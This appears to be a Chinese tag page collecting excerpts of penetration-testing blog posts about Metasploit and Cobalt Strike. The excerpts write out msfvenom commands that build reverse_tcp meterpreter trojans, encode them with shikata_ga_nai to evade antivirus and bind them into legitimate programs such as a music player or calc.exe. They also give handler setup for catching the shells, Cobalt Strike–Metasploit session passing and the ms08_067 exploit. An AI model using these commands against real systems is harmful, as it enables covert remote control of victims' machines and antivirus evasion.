meterpreter

兴趣之渗透测试学习

旧时模样 提交于 2019-11-26 09:25:28
一、msf框架 1、 生成木马程序: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘0x00’ LHOST=192.168.123.126 LPORT=5555 -f exe > asd.exe 进入程序:msfconsole 使用handler模块:use exploit/multi/handler 设置PAYLOAD:set PAYLOAD windows/meterpreter/reverse_tcp 设置控制端ip和端口:set lhost set lport 攻击:exploit 2、正常软件绑定木马程序 生成木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.123.126 lport=5555 -x 网易云音乐.exe -k -f exe -o 网易云音乐.exe 3、杀毒软件免杀木马程序 生成木马:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -x calc.exe lhost=192.168.123.126 lport=444 -f exe -o

Cobalt Strike使用教程二

落爺英雄遲暮 提交于 2019-11-26 09:23:16
0x00 前言 继 前一章 介绍了Cobalt Strike的基本用法,本章接着介绍如何攻击、提权、维权等。 0x01 与Metasploit联动 Cobalt Strike → Metasploit msf开启监听模式 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.183.147 set lport 4444 run -j 创建两个监听器,一个使用windows/beacon_http/reverse_http来监听肉鸡,另一个使用windows/foreign/reverse_http来将获取到的控制权传给msf(注意:这里的端口要与msf监听的端口一致) 利用HTML Application来生成链接,使得目标设备上线,右击选择spwan,选择msf监听器,点击Choose 返回msf查看,成功获取meterpreter会话(此方法获取到的会话并不稳定,具体原因未知) Metasploit→ Cobalt Strike 当然这里也可以通过用msfvenom生成木马,再由CS发布 msfvenom -p windows/meterpreter/reverse_tcp lhost = 192.168.183.147 lport = 4444 -f

exploit/windows/smb/ms08_067_netapi

前提是你 提交于 2019-11-26 09:22:40
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic/custom normal Custom Payload generic/debug_trap normal Generic x86 Debug Trap generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline generic/tight_loop normal Generic x86 Tight Loop windows/adduser normal Windows Execute net user /ADD windows/dllinject/bind_ipv6_tcp normal Reflective Dll

msf学习之木马

帅比萌擦擦* 提交于 2019-11-26 09:21:07
msfpayload windows/meterpreter/reverse_tcp LHOST=10.24.194.155 LPORT=55555 X >text.exe 生成一个text.exe的木马文件 msf > use exploit/multi/handler 使用handler这个模块 msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 使用这个shellcode LHOST :10.24.194.155 LPORT :55555 这里填生成木马的ip 和端口 expload 先执行msf,在执行木马 由于开了360,开始就查杀了,添加信任后还是没用,然后就把360关了,再次打开,返回了个 已杀死 一脸懵逼的我。。 之后的命令。。。用help看吧。。。 把防火墙 360 都关了之后,成功了,啊哈, meterpreter > getuid Server username: JINC\asus 查看权限 >ps 查看进程,由于太多就不放这了 meterpreter > sysinfo 查看基本信息 Computer : JINC OS : Windows 8 (Build 9200). Architecture : x64 (Current Process is WOW64) System